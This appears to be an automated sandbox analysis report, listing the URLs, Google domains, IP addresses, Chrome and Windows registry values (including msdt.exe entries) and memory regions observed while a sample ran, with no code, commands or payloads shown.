|
unknown
|
||
|
https://accounts.google.com
|
unknown
|
||
|
https://clients2.googleusercontent.com
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://www.google.com/accounts/OAuthLogin?issueuberauth=1
|
unknown
|
||
|
https://www.google.com/
|
unknown
|
||
|
https://www-googleapis-staging.sandbox.google.com
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-clang.git
|
unknown
|
||
|
https://clients2.google.com
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx
|
unknown
|
There are 21 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
accounts.google.com
|
172.217.168.45
|
||
|
clients.l.google.com
|
142.250.203.110
|
||
|
clients2.google.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.217.168.45
|
accounts.google.com
|
United States
|
||
|
192.168.2.1
|
unknown
|
unknown
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
142.250.203.110
|
clients.l.google.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
ahfgeienlihckogmohjhadlkjgocpleb
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
kmendfapggjehodndflmmgagdbamhnfd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mfehgcgbbipciphmccgaenjidiccnmng
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mhjfbmdgcfjbbpaeojofohoefgiehjai
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
neajdppkdcdipfabeoofebfddakdcjhd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nkeimhogjdpnpccoofpliimaahmaaome
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
pkedcjkdefgpdelpbcmbmeomcjbeemfm
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
dr
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.reporting
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
module_blacklist_cache_md5_digest
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
media.storage_id_salt
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_account_id
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.account_id
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_seed
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
default_search_provider_data.template_url_data
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
safebrowsing.incidents_sent
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
pinned_tabs
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
search_provider_overrides
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_default_search
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_username
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.restore_on_startup
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_version
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.prompt_wave
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage_is_newtabpage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
browser.show_home_button
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
|
user_experience_metrics.stability.exited_cleanly
|
||
|
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
There are 37 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2CBFD114000
|
heap
|
page read and write
|
|
|
|
2CBFCE90000
|
heap
|
page read and write
|
|
|
|
C990BFF000
|
stack
|
page read and write
|
||
|
1FA52E00000
|
heap
|
page read and write
|
||
|
20B23393000
|
heap
|
page read and write
|
||
|
6A1AFE000
|
stack
|
page read and write
|
||
|
E8A5DFA000
|
stack
|
page read and write
|
||
|
219B6B02000
|
heap
|
page read and write
|
||
|
219B6A5D000
|
heap
|
page read and write
|
||
|
1CA51292000
|
heap
|
page read and write
|
||
|
E8A617C000
|
stack
|
page read and write
|
||
|
D16B57F000
|
stack
|
page read and write
|
||
|
1CA56BC0000
|
remote allocation
|
page read and write
|
||
|
1CA56932000
|
heap
|
page read and write
|
||
|
24734FE000
|
stack
|
page read and write
|
||
|
1CA5690D000
|
heap
|
page read and write
|
||
|
D16AFA9000
|
stack
|
page read and write
|
||
|
1CA51B18000
|
heap
|
page read and write
|
||
|
247347C000
|
stack
|
page read and write
|
||
|
20B23368000
|
heap
|
page read and write
|
||
|
20B22AE1000
|
heap
|
page read and write
|
||
|
20B22AC0000
|
heap
|
page read and write
|
||
|
1CA51BDE000
|
heap
|
page read and write
|
||
|
1CA51BDF000
|
heap
|
page read and write
|
||
|
22A6AB02000
|
heap
|
page read and write
|
||
|
1FB82C00000
|
heap
|
page read and write
|
||
|
120B0FF000
|
stack
|
page read and write
|
||
|
1CA51B13000
|
heap
|
page read and write
|
||
|
EC0AAFF000
|
stack
|
page read and write
|
||
|
25D1BBD6000
|
heap
|
page read and write
|
||
|
22A6AA4E000
|
heap
|
page read and write
|
||
|
1CA56800000
|
heap
|
page read and write
|
||
|
20B2338F000
|
heap
|
page read and write
|
||
|
69A65F9000
|
stack
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
2CBFD110000
|
heap
|
page read and write
|
||
|
219B6A13000
|
heap
|
page read and write
|
||
|
20B23802000
|
heap
|
page read and write
|
||
|
15E4D077000
|
heap
|
page read and write
|
||
|
1CA5690F000
|
heap
|
page read and write
|
||
|
1FA52ECC000
|
heap
|
page read and write
|
||
|
1CA56B21000
|
trusted library allocation
|
page read and write
|
||
|
1C922DB6000
|
heap
|
page read and write
|
||
|
948A91B000
|
stack
|
page read and write
|
||
|
810A8FC000
|
stack
|
page read and write
|
||
|
1CA56932000
|
heap
|
page read and write
|
||
|
1C923BB0000
|
trusted library allocation
|
page read and write
|
||
|
1CA5129F000
|
heap
|
page read and write
|
||
|
38DEAFE000
|
stack
|
page read and write
|
||
|
6A1EFD000
|
stack
|
page read and write
|
||
|
1CA51229000
|
heap
|
page read and write
|
||
|
29F26E5F000
|
heap
|
page read and write
|
||
|
15E4D100000
|
heap
|
page read and write
|
||
|
16F9567C000
|
heap
|
page read and write
|
||
|
120A977000
|
stack
|
page read and write
|
||
|
20B231B0000
|
remote allocation
|
page read and write
|
||
|
1CA56932000
|
heap
|
page read and write
|
||
|
1CA568FA000
|
heap
|
page read and write
|
||
|
22A6AA85000
|
heap
|
page read and write
|
||
|
69A66F9000
|
stack
|
page read and write
|
||
|
22A6AA7B000
|
heap
|
page read and write
|
||
|
2CBFCD40000
|
heap
|
page read and write
|
||
|
22A6AB08000
|
heap
|
page read and write
|
||
|
20B233A7000
|
heap
|
page read and write
|
||
|
20B2338F000
|
heap
|
page read and write
|
||
|
677D5FF000
|
stack
|
page read and write
|
||
|
219B89C0000
|
remote allocation
|
page read and write
|
||
|
1CA5690C000
|
heap
|
page read and write
|
||
|
1DD31402000
|
heap
|
page read and write
|
||
|
1CA56934000
|
heap
|
page read and write
|
||
|
22A6AA5D000
|
heap
|
page read and write
|
||
|
22A6A7E0000
|
heap
|
page read and write
|
||
|
25D1BBF0000
|
heap
|
page read and write
|
||
|
1CA56CD0000
|
trusted library allocation
|
page read and write
|
||
|
E8A59FC000
|
stack
|
page read and write
|
||
|
16F95708000
|
heap
|
page read and write
|
||
|
20B23393000
|
heap
|
page read and write
|
||
|
1FB82C13000
|
heap
|
page read and write
|
||
|
1CA56703000
|
trusted library allocation
|
page read and write
|
||
|
1CA56940000
|
heap
|
page read and write
|
||
|
677CDDB000
|
stack
|
page read and write
|
||
|
13CF0540000
|
heap
|
page read and write
|
||
|
236E37D000
|
stack
|
page read and write
|
||
|
1CA51050000
|
heap
|
page read and write
|
||
|
16F953A0000
|
heap
|
page read and write
|
||
|
2CBFCF7D000
|
heap
|
page read and write
|
||
|
1CA56775000
|
trusted library allocation
|
page read and write
|
||
|
16F95626000
|
heap
|
page read and write
|
||
|
1CA51B18000
|
heap
|
page read and write
|
||
|
120ADFE000
|
stack
|
page read and write
|
||
|
1CA56849000
|
heap
|
page read and write
|
||
|
1CA56770000
|
trusted library allocation
|
page read and write
|
||
|
948B0FE000
|
stack
|
page read and write
|
||
|
1CA5682B000
|
heap
|
page read and write
|
||
|
219B6A62000
|
heap
|
page read and write
|
||
|
20B23373000
|
heap
|
page read and write
|
||
|
1CA56D50000
|
trusted library allocation
|
page read and write
|
||
|
25D1BBE2000
|
heap
|
page read and write
|
||
|
25D1BBE7000
|
heap
|
page read and write
|
||
|
1CA5126B000
|
heap
|
page read and write
|
||
|
1FA52E89000
|
heap
|
page read and write
|
||
|
1DD31468000
|
heap
|
page read and write
|
||
|
22A6AA13000
|
heap
|
page read and write
|
||
|
20B23393000
|
heap
|
page read and write
|
||
|
1CA5690C000
|
heap
|
page read and write
|
||
|
D16B47E000
|
stack
|
page read and write
|
||
|
247377B000
|
stack
|
page read and write
|
||
|
219B6A57000
|
heap
|
page read and write
|
||
|
1CA56CB0000
|
trusted library allocation
|
page read and write
|
||
|
1FA52F02000
|
heap
|
page read and write
|
||
|
29F26E6C000
|
heap
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
20B227E0000
|
heap
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
1C923080000
|
trusted library allocation
|
page read and write
|
||
|
1CA526D0000
|
trusted library allocation
|
page read and write
|
||
|
20B2339D000
|
heap
|
page read and write
|
||
|
1FA52EE8000
|
heap
|
page read and write
|
||
|
1CA56910000
|
heap
|
page read and write
|
||
|
20B2339A000
|
heap
|
page read and write
|
||
|
1CA56940000
|
heap
|
page read and write
|
||
|
120AB7A000
|
stack
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
1CA51261000
|
heap
|
page read and write
|
||
|
219B89C0000
|
remote allocation
|
page read and write
|
||
|
20B23393000
|
heap
|
page read and write
|
||
|
219B6A58000
|
heap
|
page read and write
|
||
|
EC0B07A000
|
stack
|
page read and write
|
||
|
1FA52EBB000
|
heap
|
page read and write
|
||
|
29F26E78000
|
heap
|
page read and write
|
||
|
13CF0641000
|
heap
|
page read and write
|
||
|
1CA567A4000
|
trusted library allocation
|
page read and write
|
||
|
1CA5690C000
|
heap
|
page read and write
|
||
|
2CBFCF6A000
|
heap
|
page read and write
|
||
|
1CA51A00000
|
heap
|
page read and write
|
||
|
69A647D000
|
stack
|
page read and write
|
||
|
1CA568E2000
|
heap
|
page read and write
|
||
|
219B6B18000
|
heap
|
page read and write
|
||
|
20B22AC6000
|
heap
|
page read and write
|
||
|
1CA56932000
|
heap
|
page read and write
|
||
|
1CA51B9A000
|
heap
|
page read and write
|
||
|
20B22A5F000
|
heap
|
page read and write
|
||
|
1CA56776000
|
trusted library allocation
|
page read and write
|
||
|
1C922D10000
|
heap
|
page read and write
|
||
|
236E07D000
|
stack
|
page read and write
|
||
|
2CBFD104000
|
heap
|
page read and write
|
||
|
2CBFD11E000
|
heap
|
page read and write
|
||
|
15E4D126000
|
heap
|
page read and write
|
||
|
1FA52E65000
|
heap
|
page read and write
|
||
|
E8A627F000
|
stack
|
page read and write
|
||
|
20B22AF8000
|
heap
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
20B233A1000
|
heap
|
page read and write
|
||
|
1CA51213000
|
heap
|
page read and write
|
||
|
22A6AA66000
|
heap
|
page read and write
|
||
|
2CBFCED2000
|
heap
|
page read and write
|
||
|
22A6AA66000
|
heap
|
page read and write
|
||
|
1CA5691F000
|
heap
|
page read and write
|
||
|
1CA5677B000
|
trusted library allocation
|
page read and write
|
||
|
2CBFED30000
|
heap
|
page read and write
|
||
|
29F26E3C000
|
heap
|
page read and write
|
||
|
29F26E58000
|
heap
|
page read and write
|
||
|
22A6AA4C000
|
heap
|
page read and write
|
||
|
1CA5690C000
|
heap
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
1FA52C80000
|
heap
|
page read and write
|
||
|
219B6860000
|
heap
|
page read and write
|
||
|
1CA5691F000
|
heap
|
page read and write
|
||
|
13CF0667000
|
heap
|
page read and write
|
||
|
1CA56776000
|
trusted library allocation
|
page read and write
|
||
|
1FB82B10000
|
trusted library allocation
|
page read and write
|
||
|
22A6AA3C000
|
heap
|
page read and write
|
||
|
D1220FE000
|
stack
|
page read and write
|
||
|
20B2339C000
|
heap
|
page read and write
|
||
|
20B23363000
|
heap
|
page read and write
|
||
|
25D1BBFF000
|
heap
|
page read and write
|
||
|
1C9230B5000
|
heap
|
page read and write
|
||
|
E8A5CFC000
|
stack
|
page read and write
|
||
|
1CA56790000
|
trusted library allocation
|
page read and write
|
||
|
1CA51BDE000
|
heap
|
page read and write
|
||
|
20B23393000
|
heap
|
page read and write
|
||
|
1C923000000
|
trusted library allocation
|
page read and write
|
||
|
20B23363000
|
heap
|
page read and write
|
||
|
29F26E62000
|
heap
|
page read and write
|
||
|
1C922CF0000
|
heap
|
page read and write
|
||
|
20B23377000
|
heap
|
page read and write
|
||
|
1CA56932000
|
heap
|
page read and write
|
||
|
1CA56910000
|
heap
|
page read and write
|
||
|
1CA56934000
|
heap
|
page read and write
|
||
|
1C922C90000
|
trusted library allocation
|
page read and write
|
||
|
20B2339F000
|
heap
|
page read and write
|
||
|
EC0ADF7000
|
stack
|
page read and write
|
||
|
1CA56B0E000
|
trusted library allocation
|
page read and write
|
||
|
20B233B4000
|
heap
|
page read and write
|
||
|
24738F7000
|
stack
|
page read and write
|
||
|
120AC7E000
|
stack
|
page read and write
|
||
|
1CA56904000
|
heap
|
page read and write
|
||
|
20B22B16000
|
heap
|
page read and write
|
||
|
1CA567D0000
|
trusted library allocation
|
page read and write
|
||
|
1CA5677A000
|
trusted library allocation
|
page read and write
|
||
|
1CA512FD000
|
heap
|
page read and write
|
||
|
25D1BBC0000
|
heap
|
page read and write
|
||
|
D1221F9000
|
stack
|
page read and write
|
||
|
219B6A48000
|
heap
|
page read and write
|
||
|
1DD31400000
|
heap
|
page read and write
|
||
|
15E4D108000
|
heap
|
page read and write
|
||
|
D122279000
|
stack
|
page read and write
|
||
|
2473BFF000
|
stack
|
page read and write
|
||
|
25D1BC01000
|
heap
|
page read and write
|
||
|
1CA5691E000
|
heap
|
page read and write
|
||
|
1CA568FD000
|
heap
|
page read and write
|
||
|
1CA56900000
|
heap
|
page read and write
|
||
|
1CA568B1000
|
heap
|
page read and write
|
||
|
1CA56910000
|
heap
|
page read and write
|
||
|
20B23363000
|
heap
|
page read and write
|
||
|
16F95664000
|
heap
|
page read and write
|
||
|
1FB82C36000
|
heap
|
page read and write
|
||
|
29F26E29000
|
heap
|
page read and write
|
||
|
22A6AA8D000
|
heap
|
page read and write
|
||
|
1CA5690C000
|
heap
|
page read and write
|
||
|
20B2339F000
|
heap
|
page read and write
|
||
|
1CA51268000
|
heap
|
page read and write
|
||
|
219B6A3D000
|
heap
|
page read and write
|
||
|
1FB83402000
|
trusted library allocation
|
page read and write
|
||
|
15E4D04E000
|
heap
|
page read and write
|
||
|
1CA511D0000
|
trusted library section
|
page read and write
|
||
|
1CA56760000
|
trusted library allocation
|
page read and write
|
||
|
1CA51B00000
|
heap
|
page read and write
|
||
|
219B6A89000
|
heap
|
page read and write
|
||
|
1CA511C0000
|
trusted library allocation
|
page read and write
|
||
|
16F95713000
|
heap
|
page read and write
|
||
|
20B22B13000
|
heap
|
page read and write
|
||
|
1DD31413000
|
heap
|
page read and write
|
||
|
1CA52360000
|
trusted library section
|
page readonly
|
||
|
29F26DD0000
|
trusted library allocation
|
page read and write
|
||
|
120B4FF000
|
stack
|
page read and write
|
||
|
1FB82A10000
|
heap
|
page read and write
|
||
|
20B231B0000
|
remote allocation
|
page read and write
|
||
|
20B233A7000
|
heap
|
page read and write
|
||
|
13CF0629000
|
heap
|
page read and write
|
||
|
20B23300000
|
heap
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
236DACC000
|
stack
|
page read and write
|
||
|
1CA56910000
|
heap
|
page read and write
|
||
|
16F9563C000
|
heap
|
page read and write
|
||
|
29F26E65000
|
heap
|
page read and write
|
||
|
29F26E7C000
|
heap
|
page read and write
|
||
|
20B23802000
|
heap
|
page read and write
|
||
|
20B2339A000
|
heap
|
page read and write
|
||
|
1CA56861000
|
heap
|
page read and write
|
||
|
1CA51266000
|
heap
|
page read and write
|
||
|
20B22850000
|
heap
|
page read and write
|
||
|
948B3FF000
|
stack
|
page read and write
|
||
|
1CA51BDE000
|
heap
|
page read and write
|
||
|
1CA56770000
|
trusted library allocation
|
page read and write
|
||
|
69A667F000
|
stack
|
page read and write
|
||
|
1CA51B18000
|
heap
|
page read and write
|
||
|
EC0A8FE000
|
stack
|
page read and write
|
||
|
219B89C0000
|
remote allocation
|
page read and write
|
||
|
1CA568F6000
|
heap
|
page read and write
|
||
|
1C922DFF000
|
heap
|
page read and write
|
||
|
1CA51A15000
|
heap
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
20B23802000
|
heap
|
page read and write
|
||
|
1CA56775000
|
trusted library allocation
|
page read and write
|
||
|
1CA56740000
|
trusted library allocation
|
page read and write
|
||
|
20B23326000
|
heap
|
page read and write
|
||
|
16F9565F000
|
heap
|
page read and write
|
||
|
20B23802000
|
heap
|
page read and write
|
||
|
38DF0FF000
|
stack
|
page read and write
|
||
|
247357E000
|
stack
|
page read and write
|
||
|
20B2339F000
|
heap
|
page read and write
|
||
|
20B2339A000
|
heap
|
page read and write
|
||
|
1CA51B18000
|
heap
|
page read and write
|
||
|
219B6B00000
|
heap
|
page read and write
|
||
|
20B23363000
|
heap
|
page read and write
|
||
|
29F26D30000
|
heap
|
page read and write
|
||
|
20B2339A000
|
heap
|
page read and write
|
||
|
1DD31E02000
|
trusted library allocation
|
page read and write
|
||
|
219B6A58000
|
heap
|
page read and write
|
||
|
1CA51BDE000
|
heap
|
page read and write
|
||
|
120AD7B000
|
stack
|
page read and write
|
||
|
1CA52000000
|
trusted library allocation
|
page read and write
|
||
|
22A6B202000
|
trusted library allocation
|
page read and write
|
||
|
29F26E5A000
|
heap
|
page read and write
|
||
|
1C922DF8000
|
heap
|
page read and write
|
||
|
2CBFCF2F000
|
heap
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
2CBFD100000
|
heap
|
page read and write
|
||
|
677D3FB000
|
stack
|
page read and write
|
||
|
20B231B0000
|
remote allocation
|
page read and write
|
||
|
1CA56907000
|
heap
|
page read and write
|
||
|
236E77F000
|
stack
|
page read and write
|
||
|
EC0A97E000
|
stack
|
page read and write
|
||
|
1CA56BC0000
|
remote allocation
|
page read and write
|
||
|
29F26E64000
|
heap
|
page read and write
|
||
|
120AF7E000
|
stack
|
page read and write
|
||
|
1FA52C10000
|
heap
|
page read and write
|
||
|
2CBFCF7D000
|
heap
|
page read and write
|
||
|
1CA568C1000
|
heap
|
page read and write
|
||
|
1DD31360000
|
heap
|
page read and write
|
||
|
20B22A85000
|
heap
|
page read and write
|
||
|
20B2339B000
|
heap
|
page read and write
|
||
|
20B23363000
|
heap
|
page read and write
|
||
|
20B2339F000
|
heap
|
page read and write
|
||
|
20B23393000
|
heap
|
page read and write
|
||
|
1CA56943000
|
heap
|
page read and write
|
||
|
29F26E3A000
|
heap
|
page read and write
|
||
|
EC0A87C000
|
stack
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
1FB82C51000
|
heap
|
page read and write
|
||
|
D12237C000
|
stack
|
page read and write
|
||
|
20B23393000
|
heap
|
page read and write
|
||
|
29F26E13000
|
heap
|
page read and write
|
||
|
22A6AB13000
|
heap
|
page read and write
|
||
|
1CA56810000
|
heap
|
page read and write
|
||
|
1CA56932000
|
heap
|
page read and write
|
||
|
2CBFED31000
|
heap
|
page read and write
|
||
|
1CA51BDE000
|
heap
|
page read and write
|
||
|
1CA5690C000
|
heap
|
page read and write
|
||
|
20B22B02000
|
heap
|
page read and write
|
||
|
1DD31479000
|
heap
|
page read and write
|
||
|
29F26E7B000
|
heap
|
page read and write
|
||
|
1CA51326000
|
heap
|
page read and write
|
||
|
1C923020000
|
trusted library allocation
|
page read and write
|
||
|
C9908FE000
|
stack
|
page read and write
|
||
|
219B68D0000
|
heap
|
page read and write
|
||
|
13CF0600000
|
heap
|
page read and write
|
||
|
20B2339F000
|
heap
|
page read and write
|
||
|
1C922D80000
|
trusted library allocation
|
page read and write
|
||
|
1CA56770000
|
trusted library allocation
|
page read and write
|
||
|
1CA568E7000
|
heap
|
page read and write
|
||
|
677D4FF000
|
stack
|
page read and write
|
||
|
29F26E55000
|
heap
|
page read and write
|
||
|
15E4D029000
|
heap
|
page read and write
|
||
|
1DD31458000
|
heap
|
page read and write
|
||
|
C990AFF000
|
stack
|
page read and write
|
||
|
1DD31370000
|
heap
|
page read and write
|
||
|
13CF0702000
|
heap
|
page read and write
|
||
|
20B22A5C000
|
heap
|
page read and write
|
||
|
1CA519D1000
|
trusted library allocation
|
page read and write
|
||
|
16F95510000
|
trusted library allocation
|
page read and write
|
||
|
1FA52E6B000
|
heap
|
page read and write
|
||
|
1CA51BDE000
|
heap
|
page read and write
|
||
|
120A56C000
|
stack
|
page read and write
|
||
|
1CA5691F000
|
heap
|
page read and write
|
||
|
6A1D7D000
|
stack
|
page read and write
|
||
|
20B2339B000
|
heap
|
page read and write
|
||
|
1CA519F0000
|
trusted library allocation
|
page read and write
|
||
|
1CA56774000
|
trusted library allocation
|
page read and write
|
||
|
29F26E46000
|
heap
|
page read and write
|
||
|
1CA56D00000
|
trusted library allocation
|
page read and write
|
||
|
6A1B7E000
|
stack
|
page read and write
|
||
|
1CA5691F000
|
heap
|
page read and write
|
||
|
20B2339F000
|
heap
|
page read and write
|
||
|
29F26E68000
|
heap
|
page read and write
|
||
|
1CA567A0000
|
trusted library allocation
|
page read and write
|
||
|
2CBFCF43000
|
heap
|
page read and write
|
||
|
20B23370000
|
heap
|
page read and write
|
||
|
EC0AA7C000
|
stack
|
page read and write
|
||
|
25D1BBD6000
|
heap
|
page read and write
|
||
|
20B22A00000
|
heap
|
page read and write
|
||
|
1CA56938000
|
heap
|
page read and write
|
||
|
25D1BE40000
|
heap
|
page read and write
|
||
|
29F26E40000
|
heap
|
page read and write
|
||
|
1FB829A0000
|
heap
|
page read and write
|
||
|
2CBFCF37000
|
heap
|
page read and write
|
||
|
25D1BB70000
|
heap
|
page read and write
|
||
|
20B23802000
|
heap
|
page read and write
|
||
|
1CA56B80000
|
trusted library allocation
|
page read and write
|
||
|
22A6AA5D000
|
heap
|
page read and write
|
||
|
1DD31502000
|
heap
|
page read and write
|
||
|
1FB82C02000
|
heap
|
page read and write
|
||
|
15E4D070000
|
heap
|
page read and write
|
||
|
1CA56BD0000
|
trusted library allocation
|
page read and write
|
||
|
20B23393000
|
heap
|
page read and write
|
||
|
1C922DFF000
|
heap
|
page read and write
|
||
|
29F26E4D000
|
heap
|
page read and write
|
||
|
1DD3143E000
|
heap
|
page read and write
|
||
|
1C923030000
|
trusted library allocation
|
page read and write
|
||
|
25D1BE45000
|
heap
|
page read and write
|
||
|
13CF065B000
|
heap
|
page read and write
|
||
|
1CA5690B000
|
heap
|
page read and write
|
||
|
20B23363000
|
heap
|
page read and write
|
||
|
20B2339B000
|
heap
|
page read and write
|
||
|
1CA57000000
|
heap
|
page read and write
|
||
|
20B22A66000
|
heap
|
page read and write
|
||
|
810A7FB000
|
stack
|
page read and write
|
||
|
1FA52D80000
|
trusted library allocation
|
page read and write
|
||
|
20B2339C000
|
heap
|
page read and write
|
||
|
236E67E000
|
stack
|
page read and write
|
||
|
1CA56854000
|
heap
|
page read and write
|
||
|
219B69F0000
|
trusted library allocation
|
page read and write
|
||
|
C99077E000
|
stack
|
page read and write
|
||
|
219B83C0000
|
trusted library allocation
|
page read and write
|
||
|
29F26DA0000
|
heap
|
page read and write
|
||
|
20B23396000
|
heap
|
page read and write
|
||
|
1CA51B18000
|
heap
|
page read and write
|
||
|
15E4D000000
|
heap
|
page read and write
|
||
|
29F26E85000
|
heap
|
page read and write
|
||
|
20B2339B000
|
heap
|
page read and write
|
||
|
15E4D049000
|
heap
|
page read and write
|
||
|
1FA53602000
|
heap
|
page read and write
|
||
|
1CA56770000
|
trusted library allocation
|
page read and write
|
||
|
20B22950000
|
trusted library allocation
|
page read and write
|
||
|
38DEFFF000
|
stack
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
219B8402000
|
trusted library allocation
|
page read and write
|
||
|
16F95700000
|
heap
|
page read and write
|
||
|
1FB82B40000
|
remote allocation
|
page read and write
|
||
|
1CA56910000
|
heap
|
page read and write
|
||
|
1CA56938000
|
heap
|
page read and write
|
||
|
1CA5693B000
|
heap
|
page read and write
|
||
|
120AFFE000
|
stack
|
page read and write
|
||
|
1C9230B9000
|
heap
|
page read and write
|
||
|
1CA56700000
|
trusted library allocation
|
page read and write
|
||
|
29F27802000
|
trusted library allocation
|
page read and write
|
||
|
1CA56D50000
|
trusted library allocation
|
page read and write
|
||
|
948B2FC000
|
stack
|
page read and write
|
||
|
D16B5FE000
|
stack
|
page read and write
|
||
|
20B233CB000
|
heap
|
page read and write
|
||
|
38DEEF7000
|
stack
|
page read and write
|
||
|
1CA51B9D000
|
heap
|
page read and write
|
||
|
22A6AB00000
|
heap
|
page read and write
|
||
|
1CA56790000
|
trusted library allocation
|
page read and write
|
||
|
1CA56932000
|
heap
|
page read and write
|
||
|
1CA56771000
|
trusted library allocation
|
page read and write
|
||
|
1CA56BB0000
|
trusted library allocation
|
page read and write
|
||
|
20B23800000
|
heap
|
page read and write
|
||
|
1C922E23000
|
heap
|
page read and write
|
||
|
16F95652000
|
heap
|
page read and write
|
||
|
29F26E63000
|
heap
|
page read and write
|
